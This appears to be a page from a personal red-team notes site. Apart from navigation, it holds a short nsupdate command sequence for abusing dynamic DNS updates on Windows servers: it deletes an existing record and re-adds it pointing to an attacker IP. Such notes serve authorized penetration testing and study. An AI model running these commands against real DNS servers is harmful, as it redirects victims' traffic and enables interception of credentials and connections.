xct's notes
Search…
Introduction
Red Team
Active Directory
Host Enum
Payloads
Passwords
Privilege Escalation
Evasion & Bypasses
Concepts & Research
Binary Exploitation
Web
Cloud
Mobile
Hardware
Crypto
Templates
Misc
DNS
Rsync
Kiosk Breakout
Redis
Linux Race
Stego
Mail
LDAP
Git
Electron
OpenBSD
Docker
Checklist Boot2Root
Linux Snippets
Memcache
Web Remote Desktop
Networking
C2 Setup
Tools
Other
Blue Team
Active Directory
Malware Analysis
SIEM
Misc
Labs
Keys & Signing
Language & Framwork Specifics
Misc
HackTheBox
Crossfit
Luanne
APT
Attended
Delivery
Cereal
Powered By GitBook
DNS

Exploit dynamic DNS updates on windows servers

1
nsupdate
2
> server <target ip>
3
> update delete <replaced entry>
4
> send
5
> update add <replaced entry> <port> <attacker ip>
6
> send
7
> quit
Copied!
Red Team - Previous
Misc
Next
Rsync
Last modified 9mo ago
Copy link